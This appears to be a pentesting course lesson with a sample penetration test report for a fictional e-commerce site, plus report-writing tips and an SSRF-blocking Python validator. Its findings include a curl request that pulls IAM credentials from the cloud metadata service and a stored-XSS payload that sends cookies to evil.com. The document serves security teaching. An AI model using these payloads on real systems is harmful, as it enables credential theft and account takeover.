Advanced Pentest Report
🔥 Vibe Prompt
"Write a professional pentest report: executive summary, risk assessment, findings, recommendations."
Report Template
# Penetration Test Report: Target Application
## 1. Executive Summary
XYZ Corp engaged us to pentest their e-commerce platform.
Scope: web app, mobile API, infrastructure (10 IPs)
Duration: 2 weeks (May 1-14, 2024)
Team: 2 senior pentesters
### Key Findings
- Total vulnerabilities: 12 (3 Critical, 4 High, 3 Medium, 2 Low)
- Attack chain achieved: Unauthenticated RCE via SSRF → Cloud metadata → IAM keys
- CVSS average: 7.8/10
### Risk Rating
| Severity | Count |
|----------|-------|
| Critical | 3 |
| High | 4 |
| Medium | 3 |
| Low | 2 |
## 2. Scope
- Web Application: https://shop.example.com
- Mobile API: https://api.example.com/v2
- Infrastructure: 10.0.0.0/24
- Source Code: GitHub repo (static analysis only)
## 3. Methodology
- Recon: passive (OSINT) + active (scanning)
- Automated: Nessus, Burp Suite Pro, Acunetix
- Manual: Business logic, auth, IDOR, race conditions
- Mobile: Frida, Objection, APKTool
## 4. Findings Detail
### CRITICAL: SSRF to Cloud Metadata (CVSS 9.1)
**Location:** /api/fetch?url=
**Description:** The fetch endpoint does not validate the supplied URL, so an attacker can reach the AWS instance metadata service.
**Reproduction:**
```bash
curl "https://shop.example.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"
```
**Impact:** Full AWS credential compromise → data breach
**Recommendation:**
- Block private IP ranges (169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12)
- Use an allowlist of approved URLs
- Remove the feature or restrict to specific domains
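The recommendation above, as an added example that is not part of the report template: a Python validator for the `/api/fetch` parameter that combines a host allowlist with the blocked ranges and resolves DNS once so a rebinding answer cannot swap in the metadata address after the check. `ALLOWED_HOSTS` and the injectable `resolver` parameter are hypothetical.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical allowlist for the report's /api/fetch feature (constructed values).
ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"cdn.example.com", "images.example.com"}

# The ranges the report recommends blocking, plus the remaining private,
# loopback and IPv6 equivalents a server-side fetcher should never reach.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "0.0.0.0/8", "100.64.0.0/10",
    "::1/128", "fc00::/7", "fe80::/10",
)]


def is_blocked_ip(ip_str):
    """True if the address falls in a blocked range (IPv4-mapped IPv6 included)."""
    ip = ipaddress.ip_address(ip_str)
    # ::ffff:169.254.169.254 is the metadata address in disguise; unwrap it.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def validate_fetch_url(url, resolver=socket.getaddrinfo):
    """Validate a user-supplied fetch URL; return the IPs it may connect to or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host or parts.username is not None or parts.password is not None:
        raise ValueError("URL must name a host and carry no credentials")
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"host not in allowlist: {host!r}")
    # Resolve here and have the HTTP client connect to these exact addresses;
    # re-resolving at request time would reopen a DNS-rebinding window.
    try:
        infos = resolver(host, parts.port or 443, proto=socket.IPPROTO_TCP)
    except socket.gaierror as exc:
        raise ValueError(f"DNS resolution failed for {host!r}: {exc}") from exc
    ips = sorted({info[4][0] for info in infos})
    blocked = [ip for ip in ips if is_blocked_ip(ip)]
    if blocked:
        raise ValueError(f"{host!r} resolves to blocked address(es): {blocked}")
    return ips
```

The caller must open the connection to the returned IPs (sending the allowlisted hostname in the Host header or SNI) rather than passing the URL to a client that resolves it again.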
### HIGH: Stored XSS (CVSS 6.8)
**Location:** User profile name field
**Description:** The name field is not sanitized, resulting in stored XSS in the profile.
**Reproduction:**
```http
POST /api/profile
{"name": "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>"}
```
**Impact:** Session hijacking, admin account takeover
**Recommendation:**
- Sanitize all user input (bleach, DOMPurify)
- Implement Content-Security-Policy
- Use HttpOnly cookies
## 5. Attack Chain Walkthrough
1. [Recon] Found fetch API endpoint via JS analysis
2. [SSRF] Accessed AWS metadata → retrieved IAM credentials
3. [Cloud] Used IAM keys to list S3 buckets → customer data exposed
4. [Auth] Weak JWT secret → forged admin token
5. [Impact] Full admin access to customer DB

Total time: 4 hours (automated + manual)
## 6. Risk Matrix
| Impact \ Likelihood | Low | Med | High |
|---------------------|-----|-----|------|
| Critical | 0 | 1 | 2 |
| High | 1 | 2 | 1 |
| Medium | 2 | 1 | 0 |
| Low | 2 | 0 | 0 |
## 7. Recommendations by Priority
**P0 (Immediate):**
- Fix SSRF (block private IPs)
- Rotate all IAM keys
- Implement WAF (Cloudflare)
**P1 (This sprint):**
- Sanitize all user inputs (XSS)
- Change JWT secret to 256-bit random
- Rate limit login endpoint
**P2 (Next sprint):**
- Implement CSP headers
- Add security headers (HSTS, X-Frame-Options)
- Move secrets to AWS Secrets Manager
**P3 (Backlog):**
- Regular dependency scanning
- Bug bounty program
- Security training for developers
## 8. Tools Used
| Tool | Purpose |
|------|---------|
| Burp Suite Pro | Web proxy, scanner |
| Nmap | Network scanning |
| Gobuster | Directory brute force |
| Frida | Mobile runtime |
| Nessus | Vulnerability scanning |
| Metasploit | Exploitation |
| Custom Python scripts | Business logic testing |
PenTesting Advanced Course Complete! 🎉
- ✅ Recon & OSINT
- ✅ Exploit Development
- ✅ Web Exploitation
- ✅ Mobile & API
- ✅ Report Writing
## Report Writing Principles
| Principle | Why |
|-----------|-----|
| Executive summary first | Non-technical audience |
| Reproduce steps clearly | Developer can verify |
| Business impact | Prioritization |
| Fix recommendations | Actionable |
| Attack chain demo | Shows real risk |
| Risk matrix | Visual priority |
## Best Practices
- Show attack chain (not just isolated bugs)
- Provide clear reproduction steps (curl commands)
- Map findings to OWASP Top 10 / CWE
- Give CVSS score for each finding
- Separate technical vs executive sections
- Include positive findings (things done right)
- Follow up after retest